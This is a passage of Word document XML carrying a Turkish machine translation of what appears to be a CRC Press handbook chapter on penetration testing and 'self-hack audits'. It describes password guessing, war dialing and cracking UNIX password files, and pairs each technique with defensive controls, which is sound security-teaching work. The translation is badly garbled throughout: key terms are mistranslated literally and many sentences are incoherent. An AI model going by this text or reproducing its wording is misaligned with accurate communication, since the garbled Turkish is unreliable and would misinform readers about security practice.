        <w:t>rozetleri kontrol etmediğini göstermektedir Ancak, bu büyük olasılıkla yüksek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kabul ve daha fazla eylem için </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ayrıca fi nal sonucuna testin ilk hedefleri karşılaştırmak gerekir. Test yönetimi tarafından belirlenen gereksinimleri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onuçlar beklenen veya beklenmeyen ve ne dereceye kadar mıydı? Test hedeflene</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">n alanda problemleri ortaya mı, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>diğer ilişkisiz alanlarda bulundu? yönetimin özgün beklentileri ile uyum içinde testlerin maliyeti veya karmaşıklık oldu</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rapor ayrıca deneğin güvenliğin geliştirilmesi için öneriler içermelidir. öneriler pe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netrasyon testinin bulgularının </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">edilmiş alanların güvenliğini artırmaya yardımcı olabilecek sadece testin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kapsadığı alanlar, aynı zamanda </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bulunmaktadır edilmelidir. Örneğin, tutarsız sistem konfigürasyonundalardır daha sıkı değişim kon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trol süreci </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gösterebilir. tester iyi bir kullanıcı kimlik doğrulama gereksinimlerine yol açabil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ecek şirketin yardım masasından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>için izin Başarılı sosyal mühendislik girişi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ldırganlar faaliyetlerini paralel görünse de, penetrasyon testi, aslında, kendi sistemle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rinde mevcut gerçek tehlikelere </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ağların sahiplerini uyarmak için hizmet vermektedir. Böyle otomatikleştirilm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">iş liman tarama, savaş arama ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>değerlendirmeleri gibi diğer risk analiz faaliyetleri, bir sistemde var olabilecek teorik açıklarını işaret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> etmek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bilgisayarın sahibinin bu faaliyetler birinden çıkış bakmak ve bu delikler te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msil asıl tehdit aldığını iyice </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemde delikleri ve zayıf noktalar bir listesini göreceksiniz. Etkili bir penetr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">asyon testi, ancak, aynı sistem </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">delikler ele alınmamıştır oluşabilir gerçek hasarı gösterir. Bu ön plana bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sistem veya siteye erişmek için </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>teknikler getirir ve daha fazla dikkat gerektiren açık alanları yapar. (Standart risk analizleri ve bertaraf stratejileri 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netrasyon testi teknikleri uygulayarak, güvenlik profesyonel öznenin kuruluş tam bir güvenlik görüntü</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RC Press LLC tarafından</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AA0047" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stephen James</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Ödem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rganizasyonlar internete kendi iç ağlarını bağlamak devam ederken, sistem yöneticile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ri ve yöneticileri sistemlerini </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>güvence altına almak ihtiyacının giderek daha duyarlı hale gelmektedir. kendini kesmek denetim (SHA) onlar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tarafından keşfedilir önce bir ağda güvenlik zayıflıkları belirlemek v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e ortadan kaldırmak için korsan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yöntemlerini kullanan bir yaklaşımdır. Bu makale, bilgisayar kaynaklarına erişmek için yetkisiz kişilerin izin ve ağ</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üvenliğini artırmak için ağ yöneticileri için adımları sağlar en sık görülen korsan teknikleri anlatılmakta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Giriş</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günün elektronik ortamda, saldırıya uğrama tehdidi birkaç talihsiz kuruluşlarda meydana gelen artık pek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mümkün olaydır. Hacker olaylar ve tehlikeye sistemlerin yeni raporlar hemen her gün görünür. organizasyon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internete kendi iç ağlarını bağlamak devam ederken, sistem yöneticileri ve yöneticileri sistemlerini güvence altın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htiyacının giderek daha duyarlı hale gelmektedir. Temel şifre kontrolleri uy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gulamak artık verilere yetkisiz </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>erişime karşı korumak için yeterlidir. Organizasyonlar artık değerlendirmek ve sistemlerini korumak için daha fazl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üncel teknikleri arıyoruz. Gelişmekte olan en popüler ve pratik tekniği kendini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kesmek denetim (SHA) 'dir. SHA </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bir hacker tarafından keşfedilir önce bir ağda güvenlik zayıflıkları belir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lemek ve ortadan kaldırmak için </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>korsan yöntemlerini kullanan bir yaklaşım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 makale SHA için metodolojiyi ve hacker geçmişte çeşitli sistemlerin nüfuz sağladı popül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orsan bir takım teknikler sunar. Her bir açıklama tür saldırıları önlemek için izlenmesi gereke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önerdi sistem yönetimi adımlar veya önlemler bir dizi izler. tartışılan konuların bazılarını UNIX</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lerine özgü olsa da, kavramlar, genel olarak tüm sistemlere uygulanabil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Kendinden Hack Denetim Amaç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mel amacı yetkisiz kişilerin sisteme erişmek için izin verebilir tüm potansiyel kontro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zayıflıklarını tespit etmektir. Ağ yöneticisi tanıdık ve sistem güvenliğini aşmak için bilinen tüm kors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knikleri kullanmalıdır. Denetimin yapısına bağlı olarak, objektif (erişim yok olabilir) ya da (yan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botaj) sistemini yok erişimin bir kullanıcının mevcut seviyelerini uzatmak ya olabil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Kendinden Hack Denetim Metodolojisi Bakış</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ararlı bir SHA gerçekleştirmek için, hacker farklı tespit ve anlaşılmalıdır. d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ünyanın uzak bir bölgesinde bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">laboratuarda oturan parlak bir bilgisayar bilimi mezunu olarak bir hacker klişe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tehlikeli bir yanılgıdır. Böyle </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hacker mevcut olmasına rağmen, güvenlik ihlalleri çoğunluğu hareket gör</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ülen örgüt personeli tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yapılmaktadır. Hackerlar dört tip olarak kategorize edile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e erişim yetkisi bir kuruluş içindeki kişiler. Bir örnek Hesaplar Ödenecek uygulam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menüsü fonksiyonları erişimi olan Muhasebe departmanında meşru personel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004 CRC Press LLC tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gibi personelini kapsay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e erişim yetkisi bir kuruluşun dışında kişiler. Bir örnek kuruluşun yazılım satıcıları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uzaktan sistem destek kişi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ine erişmek için yetkiniz olmayan bir kuruluşun dışında kişiler. Bir örnek örgütü il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içbir bağlantısı yoktur denizaşırı bir ülkede bir internet kullanıcıs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HA amacı sistem güvenliğini tehlikeye herhangi akla yöntemi kullanmaktır. Dört korsan türlerin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i tam olarak tüm olası güvenlik risklerini değerlendirmek için düşünülmelid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Popüler Hacker Teknik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şağıdaki bölümlerde teknikler en yaygın çeşitli kurumsal sistemlere erişim sağlamak için hacker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arafından kullanılan tanımlar. Her bölüm korsan tekniğini tartışır ve bu ri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">skleri azaltmaya yardımcı olmak </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uygulanabilecek temel kontrolleri önermektedir. Ağ yöneticisi bu tekni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">klerin her biri çalışmalıdır ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kuruluşun belirli bir çevreye uyum sağlayan prosedürleri belirlemelid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Log-in erişme İste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bilgisayar sistemine yasa dışı erişim sağlamanın bir yöntemi, giriş-in istemi geçer. Hacker tesis</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fiziksel olarak veya bir çevirme bağlantısı üzerinden sisteme erişmeye çalışan olduğunda bu</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urum ortaya çıkabil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Fiziksel erişim.</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rumsal bilgi sistemleri güvenliğini önemli bir adım bilgisayar kaynaklarına fiziksel erişim</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erli sınırlı olduğunu sağlamaktır. Bir terminale fiziksel erişim sağlayan herhangi bir iç veya dış kiş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turum açma isteminde oturum açma girişiminde fırsatı ver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ruluşun tesis içinde bir terminal yoluyla yetkisiz sistem erişimi için potansiyelini azaltmak iç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rminaller fiziksel olarak güvenli ortamlarda bulunu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Uygun erişim kontrol cihazları bilgisayar donanımı bulunduğu alanlara erişmek için kullanı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üm kapı ve pencereler yüklen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lara bağlanan Kişisel bilgisayarlar şifre korumalı onlar serbest alanlar bulunuyorsa bulunmakta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e erişmeye çalışan bir korsan oturum açma istemini erişim sağlamasını önce meşru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arola tahmin etmek gerekecekt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veya onların çalışma alanları yakınında şifrelerini yazmayın.</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Çevirme erişi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stemindeki log-erişmek için bir başka yöntem konakçıya olarak çevirmektir. Birçok “Daemon dialer” Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>üzerinde kolayca kullanılabilir. çevirmek için bir dizi numara verildiğinde Bu programlar, geçerli modem numaraların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anımlayabilir. Bir hacker bulduğunda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2004 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evirmeli ağ erişimi yoluyla güvenlik ihlalleri için olasılığını en aza indirmek için, ağ yöneticis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erli kontroller böyle çevirmeli oturumları için, kullanılmadığı zaman mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">emi kapatarak geri arama tesisi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanarak ya da bu tür bir kerelik şifre olarak, kimlik doğrulama ekstra seviye g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">erektiren çevirmeli oturumların </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>için yerinde .</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erişilmiş hangi sistemin bilmez ki kuruluşun logosu ve adı günlük ekran kaldır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uyarı mesajı bir suçtur ve bunların faaliyetleri kaydedilebilir olabileceğini sisteme erişm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kisiz kişilerin uyarır. Bu, bazı ülkelerde yasal bir gereklilikt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Şifreleri elde edilmes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bir kuruluşun erişim kazandı sonra log-in istemi, o sistemde oturum açmay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neyebilirsiniz. Bu prosedür geçerli bir kullanıcı kimliği ve parola birleşimi gerektir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Brute Force Saldırı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aba kuvvet saldırıları geçerli şifreleri tahmin etmek manuel ya da otomatik girişimleri içe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rogramı tahmin basit bir şifre C kod yaklaşık 60 hatları veya PERL 40 hatla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rında yazılabilir. Birçok şifre </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tahmin programları internette mevcuttur. Çoğu hacker otomatik olarak çe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">şitli sisteme atanan varsayılan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şifreleri topluluğudur Yüklendiklerinde zaman hesapları bir “şifre isabet l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">istesi” var. Örneğin, çoğu UNIX </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemlerinde konuk hesabı için varsayılan parola “misafir” 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ı yetkisiz erişime karşı korumak için, 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üm kullanıcı hesapları şifre ile korunmakta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ifre değerlerin uygun tahmin önlemek için seç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 kurulduktan sonra Varsayılan şifreleri değiştir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aşarısız log-in girişimleri kaydedilir ve uygun olarak takip edilmekte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 hesapları oturum açma başarısızlık önceden tanımlanmış sayıdan sonra dışarı kilitlen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tahmin etmek zor şifreler seçmek zorunda kalıyo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yıl boyunca periyodik olarak şifrelerini değiştirmeleri zorlanmakta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lmayan kullanıcı hesapları devre dışı bırak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eğitimli ve uygun parola yönetimi ve seçimin önemi hakkında düzenli olar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tırlat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2004 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oğu UNIX siteleri adlı bir dosyada ilgili kullanıcı hesapları ile birlikte şifrelen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">miş parolaları saklamak / etc / </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>passwd. Bir hacker bu dosyaya erişmek durumunda, o sadece böyle Crac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">k gibi bir şifre kırma programı </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>çalıştırabilirsiniz. UNIX sistemleri (denilen kript) tarafından kullanılan aynı şifreleme algoritması ile sta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ndart bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sözlüğü şifreleyerek eserlerini Crack. Bir eşleşme bulana kadar sonra şifre dosyasınd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aki girdileri karşı her şifreli </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sözlük kelimesi karşılaştırır. Çatlak gelen isimsiz bir File Transfer Protocol üzerinden serbestçe kullanılabilir ftp.cert.org /</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raçlar / köründ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ifre kırma yazılımı hacker'ın kullanımını mücadele etmek için, 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Şifreli şifreler gölge şifre dosyası ve dosyanın yeterince korunduğunu sakl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üm “zayıf” şifreleri şifre dosyası karşı Crack çalıştırarak tanıml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öyle Npasswd veya Passwd + olarak Yazılım tahmin etmek zor şifreler seçmek için kullanıcılar zorlamak için kullan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veya çalışma ortamlarına yakın şifrelerini yazmayı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ın sadece az sayıda kopyalama riskini en aza indirmek için komut satırından erişebilir / etc 